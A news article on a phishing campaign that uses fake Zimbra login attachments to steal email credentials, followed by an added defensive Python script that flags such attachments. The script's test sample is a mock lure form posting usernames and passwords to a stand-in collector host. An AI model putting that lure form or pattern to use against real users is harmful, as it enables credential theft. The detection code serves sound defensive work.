Massive phishing campaign targets Zimbra users

ESET researchers identified a new phishing campaign that aims to steal the credentials of Zimbra email accounts.

According to the researchers, the campaign started in April this year and is still actively spreading, mainly targeting small to medium businesses and governmental institutions. The largest number of targets has been in Poland, Ecuador, and Italy. So far, the threat actors responsible for the attacks have not been identified.

Zimbra Collaboration is an open-core collaborative software platform providing an email server and a web client. The service is used by more than 200,000 businesses worldwide.

Malicious HTML attachment

At the core of the phishing campaign is a malicious email with an HTML attachment that appears to be an email from a server administrator.

The email warns the target about an email server update, account deactivation, or similar issue, and directs the user to click on the attached file.

Figure: Lure email warning in Polish about deactivation of the target’s Zimbra account | Source: ESET
Figure: Machine translation of the lure email, originally in Polish | Source: ESET

The HTML file opens in the victim’s browser, creating the illusion that it is the genuine login page of a Zimbra account. The login page is customized for the targeted organization. However, the browser’s address bar reveals that the page is a local file path rather than the organization’s Zimbra server.

Figure: Fake Zimbra login page | Source: ESET

In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the malicious actor.
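Triage logic for the attachment pattern just described, added here as an example and not part of ESET’s research or tooling: it parses an HTML attachment and flags any form that takes a password and posts it to an absolute external host. The collector hostname and the sample HTML are constructed for illustration.

```python
"""Flag HTML attachments that look like local credential-harvesting login pages."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Record each <form>'s action URL and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "password": bool}
        self._current = None     # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # An <input> without a type attribute defaults to text, so only an
            # explicit type="password" marks the form as a credential form.
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html: str) -> list[str]:
    """Return action URLs of forms that collect a password and submit it to an
    absolute http(s) host. A page that arrived as a file attachment yet posts
    credentials to a remote server matches the lure described above."""
    scanner = _FormScanner()
    scanner.feed(html)
    hits = []
    for form in scanner.forms:
        target = urlparse(form["action"])
        if form["password"] and target.scheme in ("http", "https") and target.netloc:
            hits.append(form["action"])
    return hits


# Constructed sample resembling a lure attachment; not a real campaign artifact.
SAMPLE_ATTACHMENT = """
<html><body><h2>Zimbra Web Client</h2>
<form method="post" action="https://collector.example.invalid/login.php">
  <input name="username" type="text">
  <input name="password" type="password">
  <input type="submit" value="Sign in">
</form></body></html>
"""

if __name__ == "__main__":
    print(suspicious_forms(SAMPLE_ATTACHMENT))
```

This only inspects the form’s declared action; a page that submits credentials from script instead would need the attachment’s JavaScript checked for outbound requests as well.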

Researchers also noticed phishing emails sent from previously targeted Zimbra accounts. This means that malicious actors might have compromised victims' administrator accounts and created additional mailboxes that have been used in phishing campaigns.